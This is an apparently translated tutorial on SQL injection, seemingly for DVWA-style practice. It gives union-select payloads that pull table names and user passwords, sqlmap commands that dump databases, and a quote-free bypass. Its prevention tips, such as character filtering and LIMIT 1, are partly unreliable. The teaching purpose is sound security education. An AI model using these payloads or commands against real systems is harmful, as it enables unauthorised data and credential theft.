SQL injection vulnerability
1. understand
SQL injection, also known as SQL injection, is a security vulnerability that occurs at the application and database layers. Inject SQL commands into the input string. If character checks are ignored, SQL injection vulnerabilities will occur, and malicious commands will be run as normal SQL commands.
2. Detailed explanation
Cause analysis : When the user performs operations such as querying data (such as searching for movie titles), if the input is not a normal query word but an SQL statement, resulting in a change in the original SQL statement, and the program does not restrict the input content, then the will lead to loopholes.
Initial attempt:
Generally, enter SQL keywords to concatenate the content of the statement to check.
Attack method:
1. Detect whether there is a SQL injection vulnerability
Input: query content' and 1=1#
After the original query is completed, the judgment 1=1 will be executed, and only if the judgment is correct will there be output
#The role is to remove (comment) subsequent SQL statements
Input: query content' and 1=2#
Two attempts, 1=1 normal output, 1=2 error output, prove that the SQL statement is valid and there is a SQL injection vulnerability.
2. Using sql injection vulnerability
Judging the number of columns/fields: order by
Input: query content' order by 1#
If the output is normal, it means that the database has at least one column
Enter ' order by 2# again ... until there is no normal output
Know how many columns the database has
Jointly query other information: union select [sql1] [sql2]
Input: query content' union select user(),database()#
user(): returns the current database connection user
database(): returns the current database name
Union lookup table:
Input: query content' union select table_name,table_schema from information_schema.tables where table_schema = 'database name'#
You can get the names of all tables in the database
Read the content of the desired table:
Input: query content' union select user,password from users#
You can query the user name and password of the users table
3. SQLmap tool
Get the SQLmap tool online, visit the official website sqlmap.org
Use it in the command line window, cd to the corresponding folder, how to enter python sqlmap.py to execute.
Detect vulnerabilities:
python sqlmap.py -u "URL" --cookie="F12->Click Network->Refresh->Find cookie"
Get all database names:
python sqlmap.py -u "url" --cookie="" --dbs
dbs :database server
Get all table names of the specified database:
python sqlmap.py -u "URL" --cookie="" -D database name --tables
Get the specified database column/table item:
python sqlmap.py -u "URL" --cookie="" -D database name -T table name --columns
-D : Specify the database name to obtain
-T : Specify to get the table name
–columns: list table entries/columns
retrieve data:
python sqlmap.py -u "URL" --cookie="" -D database name -T table name --dump
–dump: read data
4. SQL vulnerability prevention
Filter the user's input content and prevent the input of sql statements.
Replace the special symbol with empty, or judge the user to enter the SQL statement to terminate the execution.
Add a / in front of the special symbols to make the SQL statement invalid.
Add a limit at the end of the original SQL statement, such as LIMIT 1.
Do SQL preprocessing PDO: SQL injection can be avoided with correct filtering and SQL statements.
5. Bypass method
Do not enter special characters
For example, a database named dvwa
You can replace 'dvwa' with database() or hex
Example: query content' union select table_name,table_schema from information_schema.tables where table_schema = 'database name'#
Change to: query content union select table_name,table_schema from information_schema.tables where table_schema = database()#